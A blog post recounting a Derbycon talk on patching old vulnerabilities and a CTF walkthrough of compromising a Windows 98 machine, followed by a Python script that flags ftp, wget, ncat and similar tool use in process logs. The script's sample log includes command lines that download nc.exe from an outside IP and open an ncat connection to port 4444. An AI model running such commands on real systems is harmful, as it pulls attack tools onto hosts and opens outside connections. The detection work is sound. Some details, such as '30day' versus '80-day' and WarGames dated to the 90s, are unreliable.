Worried About 0Day Attacks? Take Care of 30day first!

I have been watching the Derbycon videos (put up by IronGeek) and I like Paul Coggin’s comment: Are you worried about zero-day attacks? You have to take care of 80-day first.

I have heard Paul’s talks before, and this one at Derbycon is a bit different, but the theme is the same: do not forget the OSI Layer 2 exploits and threats. This means that Cisco devices can be attacked if they are not configured properly. This is obvious to him, as he is a pentester who goes up against Cisco routers.

It is kind of funny, as Paul says (as a side note): “many companies are worried about Zero Day attacks but have not solved the 80 day attack”.

It is a valid point, Paul: if our patching process is not set up correctly, we are not catching the 80-day-old vulnerability, never mind the zero-day (we can’t catch that one). It is important to note that we should not focus on the zero-day vulnerability, since there is nothing to do about them.

Derbycon also had a CTF (capture the flag) competition, which means there was a contest built around a real-life hacker’s riddle, and a solution that shows some of the thought processes a hacker goes through when taking over a machine.

At Derbycon’s CTF event the test hack uses the same process a criminal hacker would use in the real world.

“Hacker Process”: also called a Kill Chain: Recon, Analysis, Penetrate, Control. We like to call it SVAPE&C.

Walking through the thought process of the hacker as they perform their actions is important in order to design better defenses.

The red team (attackers) versus the blue team (defense) is the constant in the world of computer security, and so we have these CTF contests.

I don’t want to get into too many details, but a few are necessary:

In a capture the flag contest there is a lot of network traffic that the hacker (red team) has to digest and make sense of, deciding what traffic is useful and which system to review more closely.

A system named HELPDESK was found (by sniffing traffic with Wireshark), and an nmap scan showed ports 139/tcp (a Microsoft share port) and 3456/tcp open.

Then nbtscan was run to find out more information about the system.

Then a ping was done, which also gives out information.

Port 139 was Microsoft.

Port 3456 was odd, so ncat was run to probe the port.

Here the CTF oddities showed: the response came back just like the “WarGames” movie from the 90s: “WOULD YOU LIKE TO PLAY A GAME?”

From here the hack is in a different stage, having done reconnaissance and found the system and its open ports.

So, as you see in the tweet, the next step was to give a programmatic response on port 3456 (even the port number is funny, as there is no standard service with that number). As a hacker participating in the CTF, once you saw that tweet you knew what to answer to the question.

The issue now was how to penetrate the box.

The str$() response did not work correctly

Hackers do what they do, and “hack”, i.e. try different things until they succeed.

Through some tricks they were able to start a command.com DOS command prompt (after realizing this might be an old machine, so the new hacking tools would not work).

Once the hacker can execute commands on the remote system what happens next? It is the “control” piece.

Now the hacker downloads the hacking tools needed to truly control the machine (ncat and a registry program).

From there they had to find the FlagMalwareBytes registry flag in the time allotted.

This particular team placed 3rd.

There is more to the CTF event, but at this point I want to discuss the general nature of hacking. It is true that in this case the hacker was trying to control an ancient machine (Windows 98, or even 95), but the principles are the same. In fact, due to the nature of the old machines, the hackers had to use older tools.

The one lesson we need to take away (no matter the system) is that most attacks try to download tools and other items to the system being compromised, and it usually happens with manual commands such as ftp or wget.

So if you can review any manual tool commands running in your network, that would be good. Patching the local systems against all vulnerabilities gives you more defense against wily hackers.
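To make the “review manual tool commands” advice concrete, here is an added example (my own code, not from the post or from Derbycon) that scans process-creation log lines for invocations of file-transfer tools. The log format, host names, IP addresses and command lines are constructed for the example; ftp, wget and ncat come from the post, while tftp, curl and nc are assumed additions to the watch list.

```python
import re
import shlex
from dataclasses import dataclass

# Tools commonly used to pull files onto a compromised host.
# ftp, wget and ncat are named in the post; the others are assumptions.
DOWNLOAD_TOOLS = {"ftp", "tftp", "wget", "curl", "ncat", "nc"}

# Constructed log format: "<timestamp> host=<name> user=<name> cmd=<command line>"
LOG_RE = re.compile(
    r"^(?P<ts>\S+) host=(?P<host>\S+) user=(?P<user>\S+) cmd=(?P<cmd>.*)$"
)


@dataclass
class Finding:
    ts: str
    host: str
    user: str
    tool: str
    cmd: str


def tool_in_command(cmd):
    """Return the first download tool named anywhere in a command line, else None.

    The whole line is scanned (not just the first token) so wrappers such as
    'cmd.exe /c wget ...' are caught. Windows backslashes are normalised first
    so shlex does not treat them as escape characters.
    """
    normalised = cmd.replace("\\", "/")
    try:
        tokens = shlex.split(normalised)
    except ValueError:  # unbalanced quotes: fall back to whitespace split
        tokens = normalised.split()
    for tok in tokens:
        name = tok.rsplit("/", 1)[-1].lower()  # drop any path prefix
        if name.endswith(".exe"):
            name = name[:-4]
        if name in DOWNLOAD_TOOLS:
            return name
    return None


def find_tool_downloads(lines):
    """Parse log lines and return a Finding for each download-tool invocation."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m:  # malformed line: skip rather than crash the review
            continue
        tool = tool_in_command(m["cmd"])
        if tool:
            findings.append(Finding(m["ts"], m["host"], m["user"], tool, m["cmd"]))
    return findings


def findings_by_host(findings):
    """Count findings per host so the noisiest machines surface first."""
    counts = {}
    for f in findings:
        counts[f.host] = counts.get(f.host, 0) + 1
    return counts


# Constructed sample log lines (hosts, users and addresses are made up).
SAMPLE_LOG = [
    "2023-09-30T14:02:11Z host=helpdesk user=svc_backup cmd=cmd.exe /c wget http://198.51.100.7/nc.exe -O C:\\temp\\nc.exe",
    "2023-09-30T14:02:15Z host=helpdesk user=svc_backup cmd=ftp -s:C:\\temp\\get.txt 198.51.100.7",
    "2023-09-30T14:03:40Z host=web01 user=www cmd=/usr/bin/python3 app.py",
    "2023-09-30T14:04:02Z host=web01 user=deploy cmd=C:\\tools\\ncat.exe 198.51.100.7 4444",
    "2023-09-30T14:05:00Z host=fileserver user=alice cmd=explorer.exe",
    "malformed line without fields",
]

if __name__ == "__main__":
    for f in find_tool_downloads(SAMPLE_LOG):
        print(f"{f.ts} {f.host} {f.user} {f.tool}: {f.cmd}")
    print(findings_by_host(find_tool_downloads(SAMPLE_LOG)))
```

Scanning every token catches tools launched through a shell wrapper, at the cost of some noise (a line such as `grep wget /var/log/syslog` is flagged too); in practice you would tune the tool list to what is legitimately used on each host class and route the rest to review.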